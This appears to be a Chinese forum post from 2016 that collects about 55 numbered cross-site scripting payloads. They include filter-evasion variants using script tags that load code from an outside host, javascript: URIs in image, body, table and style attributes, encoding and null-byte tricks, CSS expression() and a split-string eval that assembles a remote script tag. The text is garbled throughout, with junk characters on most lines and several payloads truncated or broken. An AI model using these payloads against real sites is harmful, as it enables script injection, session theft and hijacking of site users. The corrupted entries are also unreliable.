(1)普通的XSS JavaScript注入
6 |& c: `! _2 Z {7 P9 e" o* K<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- {; s7 X8 Y9 U. b' g5 w! R& M" ](99)另类弹框. }( O6 @$ ?" N3 H/ p
<q/oncut=alert()>1
7 }) f" Z; ~" b: \, B/ Q) \0 X<s/onclick=alert()>b
: Q0 K$ `8 R1 w# `0 B <XSS=" onclick="alert(1)//">clickme</SSX="> K( v8 H; l0 @: h0 }
<zzz onclick=alert`1`>clickme</zzz> / C" W/ `% w: Z' Z
<a onclick=alert`1`>clickme</a>
_, j: U' ]( `0 y% g, r<a=">clickme</a=">% A9 ~. |5 w6 |
<a=">clickme</a>
, }, U# I3 o% p, [" _4 G$ {<z=">clickme</z=">+ u) M. N" ^3 A4 Y7 k$ `" o$ w, [9 s
<z onclick=alert`1`>clickme</z>
# i0 Q- p- o7 k6 o) Q9 L H% o
; I$ G$ ?# p- q: a4 j5 B8 p z(2)IMG标签XSS使用JavaScript命令/ L) j- J/ u5 F( U _3 t% V' t7 n. K6 t; Z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>5 h% }/ y* P8 q0 a
5 v# A: U m% _(3)IMG标签无分号无引号) Z& J( p6 K* P" _
<IMG SRC=javascript:alert(‘XSS’)>% |! q" w9 W6 u) `- E( f
9 A/ O5 {8 g. G# {) i' ]
(4)IMG标签大小写不敏感2 ^ Y* i, Z3 |
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- v+ ]. ?) z2 f d0 H" o6 Y3 {$ Y2 K/ E- J
(5)HTML编码(必须有分号)/ S3 E0 L8 s. r/ P5 d
<IMG SRC=javascript:alert(“XSS”)>
9 r$ s0 e0 n5 e( }/ w# c# W4 |) i p& q' W0 C( @" N0 d2 R/ v* o' ^" \
(6)修正缺陷IMG标签9 H6 S1 P( D6 b3 W( L) G- w+ h
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
o$ S5 b5 ~3 J9 K4 o2 V7 h3 h
6 {" ?- {9 \, h- d' k4 K(7)formCharCode标签(计算器)
1 l! e; B2 ]5 Q7 F<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
0 q0 _. @0 K# {+ f+ c
4 c3 F! D# ]: J# ~1 e(8)UTF-8的Unicode编码(计算器)& X1 f5 w; Y! j
<IMG SRC=jav..省略..S')>/ J( _, c3 n: Z; r/ Z! W
) u5 c6 C, W' Q T& G; [(9)7位的UTF-8的Unicode编码是没有分号的(计算器)1 d# d. R& |4 f. g; i
<IMG SRC=jav..省略..S')> \& I' J0 @ b2 S' v( P3 |5 g/ p
. N) F! ~9 n2 P) U K(10)十六进制编码也是没有分号(计算器)
5 C2 M. Y3 W7 \' _<IMG SRC=\'#\'" /span>
! W' i8 C0 g. n4 ] a9 P9 P& Q0 p; s6 Q7 b
(11)嵌入式标签,将Javascript分开
( T: Z1 E& |, t" B" w z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>! I: I+ S" `& g5 |1 B% t
4 c( I3 j/ S& a( x/ P3 }
(12)嵌入式编码标签,将Javascript分开
$ M" p7 f4 i1 o. o5 I<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>8 {: w8 u( L6 U9 L! g# p3 x
! [! Z+ i0 n0 B N1 |; \* ^; }
(13)嵌入式换行符
* j6 p! N8 w8 H! w; j0 ?<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
Y( u5 U" e9 l) g3 t$ W: s7 O
/ y3 A6 ~; F/ G) Z- q(14)嵌入式回车3 u+ D# _0 z6 Q( b! R3 A, ]
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>4 r. _8 J! D5 v6 Z$ B
2 r2 Q8 F" e8 f- z% v+ O* q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子4 m1 A B) A9 z. ]! M
<IMG SRC=\'#\'" /span>
1 Q- i' ]4 B9 ~% Y) Z* Q$ i: s u4 v+ ?! q, z7 L% t, v
(16)解决限制字符(要求同页面)
& w1 Y4 E/ G. ^7 A# }- B<script>z=’document.’</script>
" q0 |- v8 I. j7 v( C<script>z=z+’write(“‘</script>, f4 D& |" ^( N5 S! l* Z
<script>z=z+’<script’</script>
) Y* X: @1 [' ^1 H V& n: D<script>z=z+’ src=ht’</script>- w2 b& R. ^ L9 }
<script>z=z+’tp://ww’</script>
- x/ O! X$ ^8 d% r8 r5 w<script>z=z+’w.shell’</script>
1 z9 D0 ~5 S b1 w. ~; p<script>z=z+’.net/1.’</script>
) K5 S; W% t6 e9 M3 A; v<script>z=z+’js></sc’</script>" @0 c) P. R3 [8 n* I- t4 }$ p8 E* d
<script>z=z+’ript>”)’</script>
' M5 [, r& O% x9 V5 D- V<script>eval_r(z)</script>
+ M3 g& Q& j7 R$ H; z/ ~ N! @: l. e/ Y# H
(17)空字符
( w. |7 ?: N, P) Q% o; Cperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out- m: z4 J4 T% s
) Q/ f. H0 s" w5 }: J7 j5 ]. j* C+ ]
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用5 g* c. w3 J- J/ W( R7 S
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out t3 K7 z5 [4 }4 {
5 k# m+ B3 k1 F, I9 s( `6 {
(19)Spaces和meta前的IMG标签
6 z) [* b C! o/ u' Q, F$ @8 C<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>9 C6 @7 b& W" b- A& M* ^
+ L% T' q& M1 _# d) v- L
(20)Non-alpha-non-digit XSS
$ M4 N* i' q( | J9 N<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
: @4 v9 k! }2 G6 a4 _$ Q$ U/ }0 E
(21)Non-alpha-non-digit XSS to 2
/ q' m$ u2 X. r! W$ i4 {<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
, V2 N& _1 _5 K# y/ @. ]# `
; R9 R9 A; n/ ^5 P* M4 X6 c7 j- R(22)Non-alpha-non-digit XSS to 3
8 { P8 r: l K# k2 H% R, W<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
x8 |& x: u {3 d( N4 J n5 m. D7 }5 N/ B: J i! u
(23)双开括号" W3 L c5 x- ]4 F# M" e0 n: E
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
; K/ t9 X+ I5 q; Z* U2 x. E
; I. G2 Z' G2 `$ t! ~& B: Q(24)无结束脚本标记(仅火狐等浏览器)
: @( m# u" J7 e# q<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
; [3 v( c( p# l; x% E
) }' w, U+ a3 Q% |# b(25)无结束脚本标记20 i( q+ P9 I R' q- ?% Z# d! o
<SCRIPT SRC=//3w.org/XSS/xss.js>
, k% \% P. ~- _0 A0 Y: x+ e4 _: S7 X
5 \3 C7 H' |# v8 H) ^(26)半开的HTML/JavaScript XSS3 R* A, x! U# Q
<IMG SRC=\'#\'" /span>
, e9 @' v1 u2 J% X5 O/ q" l4 O
4 U0 N0 M- m. i t# _1 j(27)双开角括号
, u9 S% [, S) _( a2 {) K" w) s0 N<iframe src=http://3w.org/XSS.html <
9 j8 E7 G; v- W9 x: D
. Y) L# N1 e, c v, ^5 r(28)无单引号 双引号 分号
) ?4 O3 P' K+ v8 `) c' Z<SCRIPT>a=/XSS/( A/ T7 t) t. f9 y2 Q( B
alert(a.source)</SCRIPT>
- x% P. G! K8 I0 Z- o# x3 f- w4 P6 E/ d3 _
(29)换码过滤的JavaScript9 F# {( v$ k" Z# a' J& ?/ H
\”;alert(‘XSS’);// d0 W8 g' R/ n. b5 s
2 J# t0 C; A& s$ Q% _3 I9 U
(30)结束Title标签 T1 x* C$ }, F/ ^2 i5 ]6 o8 `
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( S/ Q* m) S0 X- t$ `+ ]
8 T6 N& F- |' F3 Z+ I(31)Input Image
5 x8 P1 R' E2 Y" T5 ^<INPUT SRC=\'#\'" /span>
$ R4 }* s# L# k: R/ Z/ C. Z
3 K, | {6 h2 [; S(32)BODY Image
I6 L5 \. }2 X& \<BODY BACKGROUND=”javascript:alert(‘XSS’)”>" @% K: @2 E+ X$ Z( U2 z8 Y& i
( r* W) r' O2 P7 p. |* |
(33)BODY标签
6 R* h, ?! f; x, N8 p<BODY(‘XSS’)>
* ~1 R5 L; @4 }1 r' p0 `6 n! Z9 @- S7 v$ _' |2 S3 D! f
(34)IMG Dynsrc) D+ U+ } }$ N5 }1 w6 t
<IMG DYNSRC=\'#\'" /span>
" `9 p# I! q7 \6 Y
! l2 d9 K- Z/ `6 I: T3 f(35)IMG Lowsrc" p: i. T. z7 i! X N3 W3 S
<IMG LOWSRC=\'#\'" /span>% l+ k0 p& P, M2 ^. U* S
7 k+ R) x& g/ K" L- V
(36)BGSOUND3 S/ E9 _0 _ M" U! W
<BGSOUND SRC=\'#\'" /span>( |1 {5 F6 H' v% C9 U
* e& F/ ^) S+ N6 g% g' v/ r) n(37)STYLE sheet
* [5 B$ W2 L2 P3 o8 z9 S- @! j) z<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>8 M# l3 r' `( d7 n* A% M" Z' d
, X6 x5 J7 z M: U D% C% {
(38)远程样式表
& A% @$ M* f( p: K: U" `4 {<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
( m' U( E5 s/ o( M) u' c% j+ Z5 i
3 f$ O( k( |# Q6 q(39)List-style-image(列表式)* L' a3 h2 e- s; q$ s
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS$ \% r* S' g0 f) L! ~
: C2 f6 \/ V' z. q$ I @) E(40)IMG VBscript, }0 T8 m: u: U1 ~! L6 P
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS" t$ \# f9 `) |* y
6 F4 u$ m: j# c- `: G(41)META链接url
8 q; o3 b+ \+ Q: O! {+ t, a<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>& d2 \) ^( n3 z+ }
6 r; W+ x: i7 C5 j(42)Iframe! M0 Z7 V* r+ P; I8 N9 f1 L6 f
<IFRAME SRC=\'#\'" /IFRAME>
* V0 ^! u9 P- ]" C
+ r; U8 w% d3 k(43)Frame( I/ T8 I3 c3 g- j
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>+ I* `: x+ D/ G" N3 l' K
% N o. K. {" P
(44)Table
/ c; i* K1 A' r: g2 h/ b. r1 b, ]<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
$ j( u* e @" S" r
8 X6 G0 J) F O6 O(45)TD' Z- i. a# |* G1 J& m' s
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
; d# L# W. v- K* v }* ^6 N4 n) X1 m- E& D( ]& ?
(46)DIV background-image
6 C! a! [4 P% P3 O2 B1 l<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>( t8 `8 l- A& E& f3 ? ~! U
8 l! a3 h2 R! j(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279): {; ~, Y3 Y0 g# t& D% O( h$ o
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
+ X8 H9 Q& B) c9 U& e$ w+ ~7 y
) T6 q0 ?3 N8 N9 R8 d, ](48)DIV expression4 F& r, _3 d+ u1 b1 v
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>+ s2 b2 ^4 c: r9 {2 q( v" N
8 ]) n. ^4 J" f) j5 s, f" Z
(49)STYLE属性分拆表达' Q: ~9 J# L5 j: d( r
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>& |$ N/ u$ H' b+ L/ G
9 {) }# I2 j; i! j/ ]1 x9 d
(50)匿名STYLE(组成:开角号和一个字母开头)
3 U. a+ g+ h. N* A<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
* o8 M5 {; ~( m7 g% p; H5 z. ~3 W W1 N5 X
(51)STYLE background-image
0 ]. A6 K" {, t! j' m8 i2 |% s& `<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
5 N: H) z1 P0 C- w; R
) e3 l( S5 Q' r! o& [ v R(52)IMG STYLE方式
0 ^9 q2 F$ {3 ?6 \exppression(alert(“XSS”))’>8 Q$ t7 T, n" E+ T3 f0 [
( N' o7 [7 L* E& y3 _1 M: _9 E(53)STYLE background
* _9 ~8 V' b9 h' y' y( N<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>! _( a/ n- A% J4 q5 D* N
$ i1 G0 _: R: w' X
(54)BASE+ T& | \4 B( F% a" U, X
<BASE HREF=”javascript:alert(‘XSS’);//”>
. }" J& h& |5 V
9 v9 E% s2 N- E(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS! w& n0 ]! [. h' D4 g
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>: S# n: G+ y- J9 Q
|
发表于 2016-4-28 10:06:15
收藏
支持
反对